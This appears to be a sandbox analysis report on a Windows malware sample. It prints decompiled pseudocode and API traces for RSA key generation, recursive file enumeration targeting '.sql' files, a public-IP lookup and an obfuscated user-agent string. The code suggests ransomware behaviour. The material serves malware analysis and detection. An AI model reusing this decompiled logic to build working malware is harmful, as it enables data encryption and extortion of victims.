                                        • Opcode Fuzzy Hash: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction Fuzzy Hash: 52314F75A44309BFEB20CFA0DD45FEE77B8AB49701F608548F601AA1C1DB79A660CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D62B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0F9D62B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}









                                        0x0f9d62c1
                                        0x0f9d62c5
                                        0x0f9d62cd
                                        0x0f9d6305
                                        0x0f9d6313
                                        0x0f9d6317
                                        0x0f9d631f
                                        0x0f9d631f
                                        0x0f9d6322
                                        0x0f9d633b
                                        0x0f9d6353
                                        0x0f9d635d
                                        0x0f9d6369
                                        0x0f9d637e
                                        0x00000000
                                        0x0f9d6384
                                        0x0f9d62cf
                                        0x0f9d62da
                                        0x00000000
                                        0x0f9d62fe
                                        0x0f9d62eb
                                        0x0f9d62f3
                                        0x00000000
                                        0x0f9d62fc
                                        0x00000000

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0F9D49C6,?,0F9D49CE), ref: 0F9D62C5
                                        • GetLastError.KERNEL32(?,0F9D49CE), ref: 0F9D62CF
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D49CE), ref: 0F9D62EB
                                        • CryptGenKey.ADVAPI32(0F9D49CE,0000A400,08000001,?,?,0F9D49CE), ref: 0F9D6317
                                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F9D633B
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F9D6353
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0F9D635D
                                        • CryptReleaseContext.ADVAPI32(0F9D49CE,00000000), ref: 0F9D6369
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F9D637E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 137402220-1948191093
                                        • Opcode ID: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction ID: 1f5514a9c9bdc8d3f6e7b4d77255958fbdba67b62d9a96974f9b763613daa586
                                        • Opcode Fuzzy Hash: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction Fuzzy Hash: F6219F75784309BBEB20CFA0DD4AFDE777DAB59B12F208504F701EA1C1C6B9A5609B60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0F9D6EAF
                                        • lstrlenW.KERNEL32(0F9DFF0C), ref: 0F9D6EBC
                                          • Part of subcall function 0F9D7EF0: InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                          • Part of subcall function 0F9D7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6EEB
                                        • wsprintfW.USER32 ref: 0F9D6F03
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6F19
                                        • InternetCloseHandle.WININET(?), ref: 0F9D6F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                        • String ID: GET$ipv4bot.whatismyipaddress.com
                                        • API String ID: 4289327240-2259699238
                                        • Opcode ID: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction ID: 5f71e2370dd9b9bb2034459d66c42b2ab8eff49ec4b75280de9756b4624c85b0
                                        • Opcode Fuzzy Hash: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction Fuzzy Hash: 4B01F93174520437EB206A6A9D4EF9B3E2CEBC6B51F308020FA05E10C3DE685165C6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6C90 Relevance: 13.6, APIs: 9, Instructions: 109stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F9D6A40(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F9D6BE0(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F9D6950(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F9D6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}



















                                        0x0f9d6c9c
                                        0x0f9d6c9f
                                        0x0f9d6ca1
                                        0x0f9d6ca8
                                        0x0f9d6dd6
                                        0x0f9d6dd6
                                        0x0f9d6ddc
                                        0x0f9d6cbd
                                        0x0f9d6cbd
                                        0x0f9d6cd5
                                        0x0f9d6cd8
                                        0x0f9d6cdb
                                        0x0f9d6ce5
                                        0x0f9d6ceb
                                        0x0f9d6ced
                                        0x0f9d6cf0
                                        0x0f9d6cf6
                                        0x0f9d6d04
                                        0x0f9d6d10
                                        0x0f9d6d1c
                                        0x0f9d6d22
                                        0x0f9d6d24
                                        0x0f9d6d36
                                        0x0f9d6d3c
                                        0x0f9d6d3e
                                        0x0f9d6d48
                                        0x0f9d6d4a
                                        0x0f9d6d51
                                        0x0f9d6d82
                                        0x0f9d6d85
                                        0x0f9d6d8a
                                        0x0f9d6d8d
                                        0x0f9d6d8f
                                        0x0f9d6d92
                                        0x0f9d6d95
                                        0x0f9d6d97
                                        0x0f9d6da0
                                        0x0f9d6da0
                                        0x0f9d6da3
                                        0x0f9d6da3
                                        0x0f9d6d99
                                        0x0f9d6d9c
                                        0x0f9d6d9e
                                        0x00000000
                                        0x00000000
                                        0x0f9d6d9e
                                        0x0f9d6d97
                                        0x0f9d6d53
                                        0x0f9d6d67
                                        0x0f9d6d6c
                                        0x0f9d6d6c
                                        0x0f9d6dae
                                        0x0f9d6dae
                                        0x0f9d6db0
                                        0x0f9d6db0
                                        0x0f9d6d3e
                                        0x0f9d6dbd
                                        0x0f9d6dc3
                                        0x0f9d6dc3
                                        0x0f9d6dce
                                        0x00000000
                                        0x0f9d6cf8
                                        0x0f9d6d03
                                        0x0f9d6d03
                                        0x0f9d6cf6

                                        APIs
                                          • Part of subcall function 0F9D6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                          • Part of subcall function 0F9D6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                          • Part of subcall function 0F9D6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                          • Part of subcall function 0F9D6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                          • Part of subcall function 0F9D6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                          • Part of subcall function 0F9D6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                          • Part of subcall function 0F9D6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                          • Part of subcall function 0F9D6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                          • Part of subcall function 0F9D6BE0: wsprintfW.USER32 ref: 0F9D6C03
                                          • Part of subcall function 0F9D6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                          • Part of subcall function 0F9D6BE0: GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                          • Part of subcall function 0F9D6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                        • String ID:
                                        • API String ID: 1112924665-0
                                        • Opcode ID: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction ID: 32feab062f61293210968fe358081b6120d426da6fd40f9b3eb50eeadd85a6f7
                                        • Opcode Fuzzy Hash: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction Fuzzy Hash: A131D531A04219ABDF10AF64EC84AAD77BCEF85310F24C1A6F905E7183DB34AA54DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2F50 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0F9D2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}














                                        0x0f9d2f5a
                                        0x0f9d2f69
                                        0x0f9d2f6d
                                        0x0f9d2f74
                                        0x0f9d2f76
                                        0x0f9d2f7b
                                        0x0f9d2f8d
                                        0x0f9d2f93
                                        0x0f9d2f97
                                        0x0f9d2fa3
                                        0x0f9d2fa4
                                        0x0f9d2fa7
                                        0x0f9d2fac
                                        0x0f9d2ff2
                                        0x0f9d2ffa
                                        0x0f9d3008
                                        0x0f9d2fae
                                        0x0f9d2fb1
                                        0x0f9d2fb3
                                        0x0f9d2fb8
                                        0x00000000
                                        0x0f9d2fc0
                                        0x0f9d2fc0
                                        0x0f9d2fc5
                                        0x0f9d2fcf
                                        0x0f9d2fd7
                                        0x00000000
                                        0x00000000
                                        0x0f9d2fed
                                        0x0f9d2ff0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2ff0
                                        0x0f9d3011
                                        0x0f9d3022
                                        0x0f9d3022
                                        0x0f9d2fb8
                                        0x0f9d2f99
                                        0x0f9d2f9e
                                        0x0f9d2f9e
                                        0x0f9d2f81
                                        0x0f9d2f81
                                        0x0f9d2f81
                                        0x00000000

                                        APIs
                                        • EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDeviceDriversEnumVirtual
                                        • String ID:
                                        • API String ID: 4140748134-0
                                        • Opcode ID: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction ID: 4c7de329cb28a127589ff01d55f5ce91161f909f0c02abca8b437967b4d48f0d
                                        • Opcode Fuzzy Hash: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction Fuzzy Hash: 73212932A04219BBEB208F9CDD81FEDB7BCEB44711F2041A6FE04D6181D774A9259BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7CE0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 225 f9d7ce0-f9d7ecb InternetOpenW 226 f9d7ecd-f9d7edf InternetOpenW 225->226 227 f9d7ee2-f9d7ee8 225->227 226->227
                                        C-Code - Quality: 100%
                                        			E0F9D7CE0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}




























































                                        0x0f9d7cf8
                                        0x0f9d7d04
                                        0x0f9d7d0f
                                        0x0f9d7d19
                                        0x0f9d7d23
                                        0x0f9d7d2d
                                        0x0f9d7d37
                                        0x0f9d7d41
                                        0x0f9d7d4b
                                        0x0f9d7d55
                                        0x0f9d7d5f
                                        0x0f9d7d69
                                        0x0f9d7d73
                                        0x0f9d7d7d
                                        0x0f9d7d87
                                        0x0f9d7d91
                                        0x0f9d7d9b
                                        0x0f9d7da5
                                        0x0f9d7daf
                                        0x0f9d7db9
                                        0x0f9d7dc3
                                        0x0f9d7dcd
                                        0x0f9d7dd7
                                        0x0f9d7de1
                                        0x0f9d7deb
                                        0x0f9d7df2
                                        0x0f9d7df9
                                        0x0f9d7e00
                                        0x0f9d7e07
                                        0x0f9d7e0e
                                        0x0f9d7e15
                                        0x0f9d7e1c
                                        0x0f9d7e23
                                        0x0f9d7e2a
                                        0x0f9d7e31
                                        0x0f9d7e38
                                        0x0f9d7e3f
                                        0x0f9d7e46
                                        0x0f9d7e4d
                                        0x0f9d7e54
                                        0x0f9d7e5b
                                        0x0f9d7e62
                                        0x0f9d7e69
                                        0x0f9d7e70
                                        0x0f9d7e77
                                        0x0f9d7e7e
                                        0x0f9d7e85
                                        0x0f9d7e8c
                                        0x0f9d7e93
                                        0x0f9d7e9a
                                        0x0f9d7ea1
                                        0x0f9d7ea8
                                        0x0f9d7eaf
                                        0x0f9d7eb6
                                        0x0f9d7ebd
                                        0x0f9d7ec4
                                        0x0f9d7ec6
                                        0x0f9d7ecb
                                        0x0f9d7edd
                                        0x0f9d7edf
                                        0x00000000
                                        0x0f9d7edf
                                        0x0f9d7ee8

                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                        • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                        • API String ID: 2038078732-2805935662
                                        • Opcode ID: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction ID: 2e06515f8ee9b72de9484f46fa45d8b61185205893f60446f9b794fd3d471f0b
                                        • Opcode Fuzzy Hash: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction Fuzzy Hash: 7E41A8B4811358DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D43E0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99memorystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 97%
                                        			E0F9D43E0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F9D3B20(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
